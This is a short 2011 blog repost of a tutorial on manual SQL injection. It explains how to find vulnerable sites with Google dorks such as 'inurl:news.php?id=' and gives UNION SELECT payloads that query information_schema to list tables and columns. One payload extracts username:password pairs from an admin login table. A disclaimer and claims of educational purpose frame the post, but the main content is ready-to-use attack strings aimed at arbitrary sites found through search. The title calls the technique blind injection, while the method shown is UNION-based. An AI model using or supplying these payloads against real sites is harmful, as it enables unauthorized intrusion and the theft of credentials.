Friday, September 16, 2011

HOWTO : Blind SQL Injection

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : KFProdigy

This is KFProdigy's work but not mine. I re-post it for educational purpose only.





Hello everyone, In this tutorial I show you how to manually do an SQL injection into a vulnerable site. Also, at the beginning when i say "google dorks", I dont mean that people from google are dorks, i mean actually go to google and search "dork" or "dorks"
basically its something like "inurl:news.php?id=" or anything along those lines. I hope this helps!

For more tutorials and tools, check out http://sqliunderground.co.cc , I have a really in-depth tutorial on there.
P.S. This is for educational purposes only.


THE THINGS I PASTE
group_concat(table_name)

from information_schema.tables where table_schema=database()--

concat(column,0x3a,column) from table/*

An example would be
Example.com/index.php?id=-32 UNION SELECT 1,2,3,4,5,concat(username,0x3a,password) from adminlogin/*,7,8,9 from information_schema.columns where table_schema=database()--

That's all! See you.